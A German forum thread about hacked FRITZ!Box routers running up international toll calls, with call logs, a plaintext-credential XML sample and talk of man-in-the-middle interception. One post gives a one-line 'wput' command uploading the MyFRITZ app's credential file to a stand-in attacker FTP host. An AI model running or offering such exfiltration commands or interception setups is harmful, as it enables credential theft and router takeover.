Fritz.Box wurde gehackt

In diesem Forum geht es um die Router für Kabel Internet FRITZ!Box 6320, FRITZ!Box 6340, FRITZ!Box 6360, FRITZ!Box 6490 & FRITZ!Box 6590 Cable der Firma AVM.
cemetery
Kabelneuling
Beiträge: 24
Registriert: 03.01.2014, 19:39

Re: Fritz.Box wurde gehackt

Beitrag von cemetery » 06.02.2014, 20:06

Arnie-75 hat geschrieben:Ich halte es für sehr unwahrscheinlich, dass die Einbrüche oer WLAN stattfanden. Interessenat wäre das LOG eines Betroffenen. ;)
Sorry, hab das wohl unglücklich formuliert. Ich meinte keinen Angriff per WLAN sondern das abgreifen der Daten wenn man sich z.B. über einen öffentlichen Hotspot dann auf der Box einloggt. Kommt gerade bei E-Mail Accountdaten sehr oft vor das die Daten so abgegriffen werden.

johnripper
Glasfaserstrecke
Beiträge: 1296
Registriert: 06.02.2014, 19:29
Wohnort: Kabelbw-Land

Re: Fritz.Box wurde gehackt

Beitrag von johnripper » 06.02.2014, 20:17

Deswegen ja HTTPS, somit sollte dies eigentlich nicht möglich sein.
Office & Internet 150 @ Fritz!Box 6490, OS 6.50

cemetery
Kabelneuling
Beiträge: 24
Registriert: 03.01.2014, 19:39

Re: Fritz.Box wurde gehackt

Beitrag von cemetery » 06.02.2014, 20:33

Genau, wenn nicht schon der Server auf dem die Anmeldung erfolgt bereits kompromittiert ist. In der Datenbank sind die Passwörter ja auch verschlüsselt abgelegt. Dass da was geklaut wurde ist also auch eher unwahrscheinlich. Bliebe noch die Möglichkeit das die Zugangsdaten evtl. in einer App unverschlüsselt auf dem Gerät abgelegt waren und möglicherweise von einer anderen App ausgelesen wurden. Aber das ist ohne Log Files und rekonstruierbare Details natürlich alles fischen im trüben.

toomore
Kabelneuling
Beiträge: 2
Registriert: 07.02.2014, 08:37

Re: Fritz.Box wurde gehackt

Beitrag von toomore » 07.02.2014, 08:41

Ich bin leider auch Opfer geworden, nur das Unitymedia bei mir keine Kulanz geben will, da die Fritzbox privat gekauft wurde und nicht durch Unitymedia gemietet wurde. Hab schon ganz schön Panik was für ein Betrag da jetzt kommt. Die Angreifer haben am 31.01 ca. 10x je 1-18 Sekunden nach 0023xxxxx angerufen. Die am 3.2 erzeugen vier Anrufe dürften nicht zählen, da dort Unitymedia nach eigenen Angaben bereits die Auslandanrufe gesperrt hatte. Aber warum rufen die mich dann nicht mal eben an und sagen bescheid?

Hafte ich jetzt selber für den Schade? Was kann ich tun? Ich hatte immer das neueste OS drauf und verschiedene und wechselnde Passwörter....
Zuletzt geändert von toomore am 07.02.2014, 08:45, insgesamt 1-mal geändert.

Joe Bar
Kabelneuling
Beiträge: 29
Registriert: 04.10.2013, 10:00

Re: Fritz.Box wurde gehackt

Beitrag von Joe Bar » 07.02.2014, 08:44

Hallo zusammen,

was mich jetzt mal in dem Zusammenhang interessieren würde:
Welche Boxen mit welcher Firmware waren bislang betroffen?

Gruß,
Knut
Bild

-Pirat-
Kabelneuling
Beiträge: 35
Registriert: 05.03.2011, 00:56

Re: Fritz.Box wurde gehackt

Beitrag von -Pirat- » 07.02.2014, 08:59

toomore hat geschrieben: Die Angreifer haben am 31.01 ca. 10x je 1-18 Sekunden nach 0023xxxxx angerufen...
Du glücklicher, dann schau dir mal meine Liste an

Code: Alles auswählen

03.02.2014 16:03		50022247	IP-Telefon 1	00:26
03.02.2014 15:49		50022247	IP-Telefon 1	00:26
03.02.2014 15:36		50022247	IP-Telefon 1	00:26
03.02.2014 15:24		50022247	IP-Telefon 1	00:26
03.02.2014 15:23		50022247	IP-Telefon 1	00:02
03.02.2014 15:11		50022247	IP-Telefon 1	00:26
03.02.2014 14:57		50022247	IP-Telefon 1	00:26
03.02.2014 14:56		50022247	IP-Telefon 1	00:02
03.02.2014 14:31		50022247	IP-Telefon 1	00:26
03.02.2014 14:06		50022247	IP-Telefon 1	00:26
03.02.2014 14:00		50022247	IP-Telefon 1	01:11
03.02.2014 13:50		50022247	IP-Telefon 1	00:08
03.02.2014 13:50		50022247	IP-Telefon 1	00:16
03.02.2014 13:34		50022247	IP-Telefon 1	00:16
03.02.2014 13:32		50022247	IP-Telefon 1	00:16
03.02.2014 13:25		50022247	IP-Telefon 1	00:08
03.02.2014 12:17		50022247	IP-Telefon 1	01:11
03.02.2014 12:14		50022247	IP-Telefon 1	01:11
03.02.2014 12:09		50022247	IP-Telefon 1	00:08
03.02.2014 12:04		50022247	IP-Telefon 1	00:10
03.02.2014 11:50		50022247	IP-Telefon 1	00:08
03.02.2014 11:34		50022247	IP-Telefon 1	00:16
03.02.2014 11:01		50022247	IP-Telefon 1	00:08
03.02.2014 10:54		50022247	IP-Telefon 1	01:11
03.02.2014 10:53		50022247	IP-Telefon 1	00:08
03.02.2014 10:45		50022247	IP-Telefon 1	00:10
03.02.2014 10:17		50022247	IP-Telefon 1	00:26
03.02.2014 10:15		50022247	IP-Telefon 1	00:10
03.02.2014 10:00		50022247	IP-Telefon 1	00:16
03.02.2014 09:50		50022247	IP-Telefon 1	00:10
03.02.2014 09:49		50022247	IP-Telefon 1	00:28
03.02.2014 09:17		50022247	IP-Telefon 1	00:33
03.02.2014 09:02		50022247	IP-Telefon 1	00:15
03.02.2014 08:50		50022247	IP-Telefon 1	00:12
03.02.2014 08:39		50022247	IP-Telefon 1	01:11
03.02.2014 08:25		50022247	IP-Telefon 1	00:26
03.02.2014 08:14		50022247	IP-Telefon 1	00:26
03.02.2014 07:56		50022247	IP-Telefon 1	00:26
03.02.2014 07:46		50022247	IP-Telefon 1	00:26
03.02.2014 07:30		50022247	IP-Telefon 1	00:26
03.02.2014 07:16		50022247	IP-Telefon 1	00:26
03.02.2014 07:01		50022247	IP-Telefon 1	00:26
03.02.2014 07:00		50022247	IP-Telefon 1	00:02
03.02.2014 06:51		50022247	IP-Telefon 1	00:26
03.02.2014 06:34		50022247	IP-Telefon 1	00:26
03.02.2014 06:26		50022247	IP-Telefon 1	00:26
03.02.2014 06:09		50022247	IP-Telefon 1	00:26
03.02.2014 06:06		50022247	IP-Telefon 1	00:02
03.02.2014 05:52		50022247	IP-Telefon 1	00:26
03.02.2014 05:46		50022247	IP-Telefon 1	00:02
03.02.2014 05:40		50022247	IP-Telefon 1	00:26
03.02.2014 05:19		50022247	IP-Telefon 1	00:26
03.02.2014 05:15		50022247	IP-Telefon 1	00:26
03.02.2014 05:02		50022247	IP-Telefon 1	00:09
03.02.2014 05:00		50022247	IP-Telefon 1	00:15
03.02.2014 04:51		50022247	IP-Telefon 1	00:11
03.02.2014 04:50		50022247	IP-Telefon 1	00:11
03.02.2014 04:42		50022247	IP-Telefon 1	00:07
03.02.2014 04:41		50022247	IP-Telefon 1	00:11
03.02.2014 04:35		50022247	IP-Telefon 1	00:08
03.02.2014 04:34		50022247	IP-Telefon 1	00:07
03.02.2014 04:23		50022247	IP-Telefon 1	00:12
03.02.2014 04:21		50022247	IP-Telefon 1	00:13
03.02.2014 04:12		50022247	IP-Telefon 1	00:10
03.02.2014 04:09		50022247	IP-Telefon 1	00:14
03.02.2014 04:05		50022247	IP-Telefon 1	00:07
03.02.2014 03:57		50022247	IP-Telefon 1	00:08
03.02.2014 03:57		50022247	IP-Telefon 1	00:10
03.02.2014 03:44		50022247	IP-Telefon 1	00:13
03.02.2014 03:43		50022247	IP-Telefon 1	00:15
03.02.2014 03:32		50022247	IP-Telefon 1	00:13
03.02.2014 03:32		50022247	IP-Telefon 1	00:10

Die Telefonnummer ist 0050022247 nicht 50022247
Da war einer fleißig :wand:

Benutzeravatar
SpaceRat
Glasfaserstrecke
Beiträge: 2467
Registriert: 08.05.2010, 01:30
Wohnort: Kreis Aachen
Kontaktdaten:

Re: Fritz.Box wurde gehackt

Beitrag von SpaceRat » 07.02.2014, 09:07

-Pirat- hat geschrieben:Die Telefonnummer ist 0050022247 nicht 50022247
Da war einer fleißig :wand:
Falklands Conservation

General Enquiries +500 22247
Dr. David Doxford Chief Executive Officer +500 22247
Dr Andrew Stanworth Conservation Officer +500 22247

"In partnership with government, industry and the global community, Falklands Conservation will engage and empower the people of the Falkland Islands to take action with us to conserve biodiversity and manage landscapes and seascapes for the benefit of nature and people"
Receiver/TV:
  • Vu+ Duo² 4xS2+2xC / OpenATV 6.1@Samsung 50" Plasma
  • AX Quadbox HD2400 2xS2+2xC / OpenATV 6.1@Samsung 32" TFT
  • 2xVu+ Solo² / OpenATV 6.1
  • DVBSky S2-Twin PCIe@SyncMaster T240HD (PC)
  • TechniSat SkyStar HD2@17" (2.PC)
Pay-TV: Schwarzfunk, Redlight Elite Superchic, SCT 10, HD-, Sky
Fon: VF Komfort-Classic (ISDN), 2xFritz!Fon C4+Siedle DoorCom Analog@F!B 7390
Internet: UM 1play 100 / Cisco EPC3212+Linksys WRT1900ACS / IPv4 (UM) + IPv6 (HE)
Bild

tq1199
Glasfaserstrecke
Beiträge: 1816
Registriert: 07.02.2014, 09:05

Re: Fritz.Box wurde gehackt

Beitrag von tq1199 » 07.02.2014, 09:13

toomore hat geschrieben:Was kann ich tun? ...
Benutzt Du den myfritz-Dienst von AVM? Kannst Du im Log deiner FritzBox sehen, von welcher externen (öffentlicher) IP-Adresse, der Angreifer sich auf deiner FritzBox angemeldet hat?

johnripper
Glasfaserstrecke
Beiträge: 1296
Registriert: 06.02.2014, 19:29
Wohnort: Kabelbw-Land

Re: Fritz.Box wurde gehackt

Beitrag von johnripper » 07.02.2014, 09:21

toomore hat geschrieben:Ich bin leider auch Opfer geworden, nur das Unitymedia bei mir keine Kulanz geben will, da die Fritzbox privat gekauft wurde und nicht durch Unitymedia gemietet wurde.
Die Konfiguration musst du uns erklären.
Office & Internet 150 @ Fritz!Box 6490, OS 6.50

toomore
Kabelneuling
Beiträge: 2
Registriert: 07.02.2014, 08:37

Re: Fritz.Box wurde gehackt

Beitrag von toomore » 07.02.2014, 09:24

johnripper hat geschrieben:
toomore hat geschrieben:Ich bin leider auch Opfer geworden, nur das Unitymedia bei mir keine Kulanz geben will, da die Fritzbox privat gekauft wurde und nicht durch Unitymedia gemietet wurde.
Die Konfiguration musst du uns erklären.
Die Fritbox ist eine 7330 und ist per Lan Port hinter das Cisco Modem gehängt. Vorher hatte ich einen DLink Router von Unitymedia dahinter. Nachdem der laut Unity eine Sicherheitslücke hatte, habe ich meine Fritzbox angeschlossen. Wohl genauso unsicher :/ Ja habe myFritz genutzt, habe aber nun alle Haken entfernt, MyFritz Account gelöscht und das Telefon physikalisch von der Fritzbox abgezogen.

Wie teuer sind den diese Nummern? 60er Taktung oder wie?

tq1199
Glasfaserstrecke
Beiträge: 1816
Registriert: 07.02.2014, 09:05

Re: Fritz.Box wurde gehackt

Beitrag von tq1199 » 07.02.2014, 09:35

toomore hat geschrieben:MyFritz Account gelöscht ...
Ja, ... verstehe.
toomore hat geschrieben: ... das Telefon physikalisch von der Fritzbox abgezogen.
BTW: Der Angreifer hat nicht dein Telefon benutzt.
Kannst Du im Log deiner FritzBox sehen, von welcher externen (öffentlicher) IP-Adresse, der Angreifer sich auf deiner FritzBox angemeldet hat?

EDIT:

Wenn Du diese externe (öffentliche) IP-Adresse hast, dann erstatte Anzeige gegen denjenigen, der diese externe IP-Adresse am ... (siehe Datum und Uhrzeit im Log deiner FritzBox) verwendet hat.

EDIT 2:

Benutzt Du evtl. Fritz!Apps von AVM oder fremd, auf deinem Smartphone/Tablet für deine FritzBox?
Office Internet & Phone 50, AVM FRITZ!Box 6360 Cable (kbw) - FRITZ!OS 06.52 - , an Arris-CMTS, zusätzlich eine feste (statische, nicht per DHCP) IPv4-Adresse für meinen Server, am Bridge-Anschluss (kein Bridge-Modus, FB6360-cable wird ohne feste IPv4-Adresse als Router verwendet.)
Konfigurationsdatei der FritzBox: b2b-staticip1_50000_5000_ipv4_sip_wifi-on.bin
NTP_Provider_Interface_Spec_Unitymedia

AVM - IPv6 technical note

Benutzeravatar
SpaceRat
Glasfaserstrecke
Beiträge: 2467
Registriert: 08.05.2010, 01:30
Wohnort: Kreis Aachen
Kontaktdaten:

Re: Fritz.Box wurde gehackt

Beitrag von SpaceRat » 07.02.2014, 10:11

Ich schließe mich zunehmend der Haltung an, daß hier genau gar nichts gehackt wurde.

Soweit das zu überblicken ist, haben sich die Angreifer schnurstracks mit den richtigen Zugangsdaten eingeloggt und nicht geknobelt und probiert.
Die wahrscheinlichste Variante ist also, daß die Opfer ihnen die Daten auf dem Silbertablett, zumindest einem versilberten, geliefert haben.

Es könnte sich um irgendeine sensationell wichtige App handeln, die unbedingt Zugang zur Fritz!Box braucht und die Zugangsdaten dann - sicher ist sicher, so vergißt sie keiner ;) - dem App-Anbieter zuspielt. Auch möglich wäre, daß eine weitere App Daten ausliest.

Schauen wir doch mal nach:
MyFRITZ!App

Man beachte:
Bild

Also alles was man zum Glück braucht.

Und das finden wir dann auch im Klartext auf dem Smartphone wieder:
<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
<string name="BoxName">FRITZ!Box Fon WLAN 7390</string>
...
<string name="Password">Passwort_im_Klartext</string>
...
<string name="Adresse">labersuelzrhabarber.myfritz.net</string>
<string name="Boxname">FRITZ!Box Fon WLAN 7390</string>
<int name="Port" value="123" />
<string name="Username">Otto Opfer</string>
<boolean name="AnonymousLogin" value="true" />
<boolean name="SingleSignOn" value="true" />
</map>
Jetzt fehlt nur noch eine Version vom Quiz-Duell oder Weißdergeierwas, die nicht nur gecracked, sondern auch noch etwas "ergänzt" wurde ...
Receiver/TV:
  • Vu+ Duo² 4xS2+2xC / OpenATV 6.1@Samsung 50" Plasma
  • AX Quadbox HD2400 2xS2+2xC / OpenATV 6.1@Samsung 32" TFT
  • 2xVu+ Solo² / OpenATV 6.1
  • DVBSky S2-Twin PCIe@SyncMaster T240HD (PC)
  • TechniSat SkyStar HD2@17" (2.PC)
Pay-TV: Schwarzfunk, Redlight Elite Superchic, SCT 10, HD-, Sky
Fon: VF Komfort-Classic (ISDN), 2xFritz!Fon C4+Siedle DoorCom Analog@F!B 7390
Internet: UM 1play 100 / Cisco EPC3212+Linksys WRT1900ACS / IPv4 (UM) + IPv6 (HE)
Bild

cemetery
Kabelneuling
Beiträge: 24
Registriert: 03.01.2014, 19:39

Re: Fritz.Box wurde gehackt

Beitrag von cemetery » 07.02.2014, 10:17

Das untermauert dann genau den Verdacht den ich gestern auch schon ausgesprochen habe. :super:

Benutzeravatar
SpaceRat
Glasfaserstrecke
Beiträge: 2467
Registriert: 08.05.2010, 01:30
Wohnort: Kreis Aachen
Kontaktdaten:

Re: Fritz.Box wurde gehackt

Beitrag von SpaceRat » 07.02.2014, 10:24

Und das ist dann der ganze Hack:
wput /data/data/de.avm.android.myfritz/shared_prefs/de.avm.android.myfritz_preferences.xml ftp://send.me.all.your.data.cn/Project_ ... irgendeine ZufallsID>.xml

Statt wput tut's auch so ziemlich alles andere.

Einziges Problem: Hierfür braucht die App man root-Zugriff

planethas
Kabelneuling
Beiträge: 8
Registriert: 31.01.2014, 22:53

Re: Fritz.Box wurde gehackt

Beitrag von planethas » 07.02.2014, 11:03

Zu den ganzen Vermutungen hier kann ich sagen, dass ich keine Zugangsdaten zu dieser Box in einer App hinterlegt habe/hatte.

Zu den Aussagen, HTTPS sei sicher möchte ich mal ein einfach ein paar Fakten in den Raum werfen.

Natürlich ist das HTTPS Protokoll mit den gängigen Standards Sicher, sofern die Zertifikatsquelle und/oder der Herausgeber des Zertifikats vertauenswürdig ist.

Habt Ihr auf eurer Fritzbox ein Öffentliches Zertifikat installiert oder habt das Selfsign Fritzbox Zertifikat auf jedem System von dem Ihr aus auf die Box zugreift vorher persönlich von der Box auf das jenige System übertragen und im Zertifikatsspeicher des Geräts als vertrauenswürdiges Zertifikat hinterlegt?

Oder wissen hier einfach einige nicht, dass auch bei HTTPS Man-In-The-Middle möglich ist. Sofern man nicht min. den Thumbprint des Zertifikats mit dem Original vergleicht, ist ein Selfsign Zertifikat keine Hürde.

Es ist ein einfaches im Stream das Zertifikat zu tauschen und alle Daten im Klartext mitzulesen. Das größere Problem hierbei ist es, den Datenstrom überhaupt so zu leiten/abzugreifen, dass mann an die Daten kommt. Aber auch dies ist mittels ARP Spoofing in selben Netz möglich, wobei gängige Firmware auf Switches dies erkennt und blockiert.

Aber wer weiß schon, welche neue Spoofing Methode die evtl nutzen um den Datenstrom abzugreifen/umzuleiten etc.
Zuletzt geändert von planethas am 07.02.2014, 11:08, insgesamt 1-mal geändert.

Benutzeravatar
SpaceRat
Glasfaserstrecke
Beiträge: 2467
Registriert: 08.05.2010, 01:30
Wohnort: Kreis Aachen
Kontaktdaten:

Re: Fritz.Box wurde gehackt

Beitrag von SpaceRat » 07.02.2014, 11:07

Ohne root ist übrigens immer noch ein Mitschnitt einer Anmeldung möglich, dazu braucht man lediglich einen transparenten https-Proxy (Charles, mitmproxy).

Aufgrund der kranken (Sicherheits!-)Denke von manchen Entwicklern ist es nämlich auf Androiden so gut wie unmöglich, für solche Zugriffe mit Zertifikaten zu arbeiten:
Wer schon mal versucht hat, ein Zertifikat auf einem Androiden zu installieren, wird das in der Regel schnell wieder gelassen haben, weil er dann von Android dazu gezwungen wird, statt des einfachen "Wischens" mindestens eine Entsperrgeste einzustellen, was früher oder später nervt.
Da sich nun die Fritz!Box ihr Zertifikat aufgrund flexibler URL/IP selber erzeugen muß/müßte und das nicht einfach so eben von einer standardmäßig vorhanden Root Authority signieren lassen kann, kann die MyFritz!App gar keine brauchbare Überprüfung des Zertifikats durchführen und liefert daher die Daten auch durch einen Man-In-The-Middle-Proxy ab.

HTTPS bringt nämlich nur dann etwas, wenn die Zertifikate auch überprüft werden:
Loggt man sich einfach mal per https auf seinem NAS oder E2-Receiver o.ä. ein, dann wird man feststellen, daß man von Chrome, Firefox, IE etc. gewarnt wird, daß sich die Authentizität des Zertifikates nicht überprüfen läßt (Logisch, denn dem System ist der Aussteller nicht bekannt).

Auf dem PC läßt sich das Problem nun ganz einfach beheben:
Wenn man überprüft hat, daß die Namensauflösung auch wirklich auf den eigenen NAS etc. zeigt und das dem Browser angebotene Zertifikat in Bezug auf den Fingerprint mit dem selber erzeugten übereinstimmt, dann installiert man es einfach. Danach sieht man jederzeit am grünen oder roten bzw. durchgestrichenen "https", ob das Zertifikat nun gültig ist oder eben nicht. Selbst wenn ein Dritter ein Zertifikat für die Adresse erzeugt, unter der wir den NAS o.ä. ansprechen, wäre es auch noch lange nicht das selbe Zertifikat und somit ebenfalls ungültig.

Nun wäre es natürlich auch sinnvoll, diese Zertifikate auf dem Smartphone zu installieren, damit man gerade und insbesondere unterwegs sicher sein kann, daß man seine Anmeldedaten in das richtige (eigene) System kloppt und nicht irgendeines, das man gerade vorgesetzt bekommt (Und so ein transparenter Proxy ist eben auch ein solches, HTTPS-MITM-Angriffe sind nämlich prinzipiell zum Scheitern verurteilt, wenn der Benutzer bzw. die App auf die Korrektheit der Zertifikate achtet, ein MITM kann nämlich kein gültiges sondern bestenfalls ein ähnliches erzeugen! ...) und eben das verhindert Android und das ausgerechnet aus "Sicherheitsgründen".

Und aus diesem Grund können dann eben auch die Fritz!Apps gar keine wirkliche Überprüfung durchführen und sind somit anfällig für MITM-Angriffe ... zum Wohle der Sicherheit!

Benutzeravatar
SpaceRat
Glasfaserstrecke
Beiträge: 2467
Registriert: 08.05.2010, 01:30
Wohnort: Kreis Aachen
Kontaktdaten:

Re: Fritz.Box wurde gehackt

Beitrag von SpaceRat » 07.02.2014, 11:18

planethas hat geschrieben:Habt Ihr auf eurer Fritzbox ein Öffentliches Zertifikat installiert oder habt das Selfsign Fritzbox Zertifikat auf jedem System von dem Ihr aus auf die Box zugreift vorher persönlich von der Box auf das jenige System übertragen und im Zertifikatsspeicher des Geräts als vertrauenswürdiges Zertifikat hinterlegt?
Ich ja :)

Und für alle anderen Geräte habe ich auch entsprechende Zertifikate selber erzeugt ...
planethas hat geschrieben:Aber wer weiß schon, welche neue Spoofing Methode die evtl nutzen um den Datenstrom abzugreifen/umzuleiten etc.
Dafür reicht eine ... Fritz!Box ... Du schiebst einfach einen transparenten https-Proxy unter.

Da die Fritz!Apps die Zertifikate nicht prüfen (können) und wohl auch ein Großteil der Benutzer das nicht tut, ist das eine Kleinigkeit.

Ein MITM-Angriff auf https ist aber vom Grundsatz her unmöglich.
Möglich wird er erst, wenn man die Vorsichtsregeln, also das durchgestrichene "https", in der URL ignoriert oder die Zertifikate an sich Müll sind. Dann nutzt man aber im Prinzip eben auch kein https mehr, sondern nur http.

planethas
Kabelneuling
Beiträge: 8
Registriert: 31.01.2014, 22:53

Re: Fritz.Box wurde gehackt

Beitrag von planethas » 07.02.2014, 11:37

Oder wie schon des öffteren, sind evtl. wieder welche in einer CA "eingebrochen" und haben sich ein paar Zertifikate ausgestellt. Dann merkt es auch niemand.

Aber ohne Glaskugel kommen wir mit solchen Theorien nicht zum Ziel.

johnripper
Glasfaserstrecke
Beiträge: 1296
Registriert: 06.02.2014, 19:29
Wohnort: Kabelbw-Land

Re: Fritz.Box wurde gehackt

Beitrag von johnripper » 07.02.2014, 12:44

planethas hat geschrieben:Zu den ganzen Vermutungen hier kann ich sagen, dass ich keine Zugangsdaten zu dieser Box in einer App hinterlegt habe/hatte.
Danke für die Aussage.
Ich hätte auch auf irgendeine APP getippt.

Dir kann man nur raten Strafanzeige zu erstatten und die Daten von der Box soweit wie möglich zu sichern.
Ferner würde ich mich an AVM wenden.

Edit: Und checke nach der Anleitung von AMV ob IP Telefone eingerichtet sind bzw. schließe den Fernzugang.
Office & Internet 150 @ Fritz!Box 6490, OS 6.50

Benutzeravatar
koax
Kabelkopfstation
Beiträge: 3970
Registriert: 09.12.2007, 10:43
Wohnort: Köln

Re: Fritz.Box wurde gehackt

Beitrag von koax » 07.02.2014, 13:21

Arnie-75 hat geschrieben:Was stand denn im LOG bzw. unter SYSTEM, als sich der Angreifer angemeldet hat? Wenn ich mich übers Internet anmelde steht da z.B.
"Anmeldung des Benutzers MeinName an der FRITZ!Box Benutzeroberfläche von IP-Adresse xx.143.xxx.xxx"
Wer sich in die Benutzeroberfläche der Fritzbox eingelogt hat kann auch das Protokoll löschen.

johnripper
Glasfaserstrecke
Beiträge: 1296
Registriert: 06.02.2014, 19:29
Wohnort: Kabelbw-Land

Re: Fritz.Box wurde gehackt

Beitrag von johnripper » 07.02.2014, 13:22

Wir aber lt. diversen Berichten nicht gemacht. Die Hacker sind nicht daran interessiert ihre Spuren zu verwischen.
Office & Internet 150 @ Fritz!Box 6490, OS 6.50

tq1199
Glasfaserstrecke
Beiträge: 1816
Registriert: 07.02.2014, 09:05

Re: Fritz.Box wurde gehackt

Beitrag von tq1199 » 07.02.2014, 13:27

johnripper hat geschrieben:Wir aber lt. diversen Berichten nicht gemacht.
Evtl. weil man IP-Adressen auch faken kann.
Office Internet & Phone 50, AVM FRITZ!Box 6360 Cable (kbw) - FRITZ!OS 06.52 - , an Arris-CMTS, zusätzlich eine feste (statische, nicht per DHCP) IPv4-Adresse für meinen Server, am Bridge-Anschluss (kein Bridge-Modus, FB6360-cable wird ohne feste IPv4-Adresse als Router verwendet.)
Konfigurationsdatei der FritzBox: b2b-staticip1_50000_5000_ipv4_sip_wifi-on.bin
NTP_Provider_Interface_Spec_Unitymedia

AVM - IPv6 technical note

Benutzeravatar
SpaceRat
Glasfaserstrecke
Beiträge: 2467
Registriert: 08.05.2010, 01:30
Wohnort: Kreis Aachen
Kontaktdaten:

Re: Fritz.Box wurde gehackt

Beitrag von SpaceRat » 07.02.2014, 16:48

Für die 7390 wurde heute eine neue Firmware 6.03 veröffentlicht, deren einzige Änderung lautet:

Neue Features: - Sicherheit: Ausspähen von Benutzerdaten auf FRITZ!Box verhindert.

Was dahinter steckt, weiß ich aber nicht.

Benutzeravatar
rudy102
Kabelneuling
Beiträge: 10
Registriert: 28.01.2014, 11:32

Re: Fritz.Box wurde gehackt

Beitrag von rudy102 » 07.02.2014, 17:19

UM 2 Play 120Mbit
Fritz!Box 6490 FRITZ!OS 06.50

TelTel
Übergabepunkt
Beiträge: 326
Registriert: 07.03.2010, 16:06
Wohnort: Haan

Re: Fritz.Box wurde gehackt

Beitrag von TelTel » 07.02.2014, 17:25

Ursache laut AVM gefunden:

http://www.avm.de/de/Presse/Information ... 02_07.php3
Zuletzt geändert von TelTel am 07.02.2014, 18:01, insgesamt 1-mal geändert.
Bild

Antworten

Wer ist online?

Mitglieder in diesem Forum: 0 Mitglieder und 3 Gäste